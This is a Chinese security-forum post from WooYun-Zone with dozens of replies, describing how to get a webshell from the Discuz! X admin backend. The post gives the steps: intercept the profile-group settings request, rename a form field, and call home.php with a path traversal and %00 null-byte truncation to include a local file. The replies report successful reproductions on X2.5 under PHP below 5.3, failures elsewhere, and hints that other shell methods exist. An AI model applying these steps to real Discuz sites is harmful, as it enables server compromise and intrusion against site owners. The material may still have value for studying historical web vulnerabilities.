dz x 后台怎么拿shell

  • A+
所属分类:WooYun-Zone

用户 – 用户栏目 – 栏目分组 抓包

Content-Disposition: form-data; name=”settingnew[profilegroupnew][base][available]”

改为

Content-Disposition: form-data; name=”settingnew[profilegroupnew][plugin][available]”

访问

/home.php?mod=spacecp&id=../../robots.txt%0057

dz x 后台怎么拿shell

虽然涉及0×00截断 但无视 GPC

就这样 有钱的捧个钱场 没钱的捧的人场 谢谢

  1. 1#

    Xhm1n9 | 2013-05-24 08:12

    顶个,大半夜的不容易

  2. 2#

    Cr4zy | 2013-05-24 08:19

    感谢 +1

  3. 3#

    wefgod (求大牛指点) | 2013-05-24 08:58

    给力啊

  4. 4#

    乐斗菜菜 | 2013-05-24 08:58

    流弊,这个方法适用 x2  x2.5吗?

  5. 5#

    HuGtion | 2013-05-24 09:04

    给力

  6. 6#

    CnCxzSec(衰仔) | 2013-05-24 09:13

    这快天亮了真心不容易 给力!

  7. 7#

    最热微博 (((‮data;))) | 2013-05-24 09:16

    给力

  8. 8#

    楼上是马甲 | 2013-05-24 09:23

    x2.5测试成功  厉害

  9. 9#

    楼上是马甲 | 2013-05-24 09:24

    莫非楼主是toby57的马甲
    我的偶像啊  -_-

  10. 10#

    Master (小菜一枚) | 2013-05-24 10:04

    不错。。。

  11. 11#

    龙臣 (你站住了标准,你就成为了标准。) | 2013-05-24 10:16

    不错

  12. 12#

    bittertea (Bittertea.pw) | 2013-05-24 10:34

    测试一下

  13. 13#

    xcl0ud | 2013-05-24 10:38

    Mark

  14. 14#

    xsser | 2013-05-24 10:42

    这兄弟是想拿乌云奖金的节奏啊

  15. 15#

    saline (碧池就是碧池) | 2013-05-24 10:43

    @楼上是马甲 @t00000by57 表示测试时没有抓到 Content-Disposition 头诶

  16. 16#

    暴暴 | 2013-05-24 10:45

    好东西啊。。哈哈,等了好久了的一个DZ 后台有救啦!!!

  17. 17#

    coco | 2013-05-24 10:50

    强悍

  18. 18#

    debug | 2013-05-24 10:51

    还有其他的办法  呵呵

  19. 19#

    do9gy | 2013-05-24 11:12

    dz x 后台怎么拿shell  好像没能截断

  20. 20#

    cnrstar (Be My Personal Best!) | 2013-05-24 11:18

    牛逼啊、Mark

  21. 21#

    t00000by57 (no exploit) | 2013-05-24 11:19

    @do9gy php什么版本

  22. 22#

    saline (碧池就是碧池) | 2013-05-24 11:29

    @t00000by57 致敬!已成功复现!

  23. 23#

    Sogili (.) 长短短 (.) | 2013-05-24 11:35

    牛逼,已感谢

  24. 24#
    感谢(1)

    酱油甲 | 2013-05-24 11:46

    MARK,已撸

  25. 25#

    xsser | 2013-05-24 11:48

    @Sogili 怎么现在社区付费意识这么高

  26. 26#

    saline (碧池就是碧池) | 2013-05-24 12:32

    dz x 后台怎么拿shell
    php version 5.2.14
    gpc = on

  27. 27#

    sinck | 2013-05-24 12:35

    @saline 也木找到

  28. 28#

    dante | 2013-05-24 12:40

    估计马上要被修复了

  29. 29#

    P w | 2013-05-24 14:16

    捧个人场。,

  30. 30#

    DarkSun.Evil | 2013-05-24 14:22

    牛B,真心的!     呃…  似乎也没能截断。

  31. 31#
    感谢(1)

    Passer_by (腾讯微博的Passer-by不是我) | 2013-05-24 17:28

    顶个,大半夜的不容易

  32. 32#

    GaRY | 2013-05-24 17:34

    @xsser 因为他们有钱人,有wb。我就不敢乱感谢

  33. 33#

    江南的鱼 | 2013-05-24 20:23

    给了我新希望啊

  34. 34#

    江南的鱼 | 2013-05-24 20:56

    截断成了悲剧,现在基本都php5.3以上了吧?反正我没能截断,我本地也没有办法生成需要的htm

  35. 35#

    bittertea (Bittertea.pw) | 2013-05-25 11:23

    测试了一下  没有截断

  36. 36#

    Vty | 2013-05-26 05:51

    @xsser 你是牛                  逼吗?

  37. 37#

    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2013-05-26 08:21

    discuz X2.5-3.0
    环境php<5.3

  38. 38#

    do9gy | 2013-05-26 22:38

    @t00000by57   5.4.11

  39. 39#

    江南的鱼 | 2013-05-27 01:14

    discuz X2 也存在,但是前提是要能截断

  40. 40#

    My5t3ry | 2013-05-27 20:43

    给力哇

  41. 41#

    无我 | 2013-05-27 22:15

    只能暴路径?作用不大!

  42. 42#

    爱上平顶山 | 2013-05-29 02:09

    @t00000by57     这个怎么抓包?   用什么抓?  谢谢了

  43. 43#

    剑走偏锋 (贱走偏疯丨Mean deviation.) | 2013-05-30 12:22

    @debug 还有什么办法啊 、

  44. 44#

    debug | 2013-05-30 20:00

    @剑走偏锋  这个不方便说。

  45. 45#

    t00000by57 (no exploit) | 2013-05-30 20:06

    @debug 是指前台那个执行么 ..

  46. 46#

    debug | 2013-05-31 12:51

    @t00000by57 不是前台的  是别的 呵呵

  47. 47#

    江南的鱼 | 2013-06-01 13:17

    至少还有2个方法能拿shell

  48. 48#

    漫无目的 (爱好就是天赋) | 2013-06-17 18:52

    同环境下 x2无法截断 x3正常包含

  49. 49#

    also (阿里山的姑娘没水冲凉) | 2013-06-22 13:48

    出现19楼的问题,坐等解决

  50. 50#

    小乐天 ([email protected]) | 2013-06-25 17:16

    有时间试下

  51. 51#

    darksn0w | 2013-07-03 15:57

    @漫无目的 你貌似是宝宝。。。。

  52. 52#

    牛博恩 | 2013-07-12 14:11

    未能截断。

  53. 53#

    anyis | 2013-08-13 21:02

    @漫无目的 同样的 未能找到可以控制htm的办法.

  54. 54#

    BlackWidow7 (哇咔咔) | 2013-09-05 18:40

    截断了还要写php脚本来进行一个上传。

  55. 55#

    书生 (WooYun(白帽子技术社区)) | 2013-09-26 13:55

    @江南的鱼 再求一个方法

  56. 56#

    Forever80s (~~~~~~~~) | 2013-10-17 00:39

    X2 的不能用

  57. 57#

    路人甲我来了 | 2013-12-06 00:57

    = =这个在linux下不可以用吗?

  58. 58#

    zeger | 2013-12-10 13:51

    不能截断的也可以进一步利用~

  59. 59#

    ice (%2F) | 2013-12-10 14:37

    mark

  60. 60#

    花生^_^ (加强学习~) | 2013-12-10 19:30

    捧个人场~~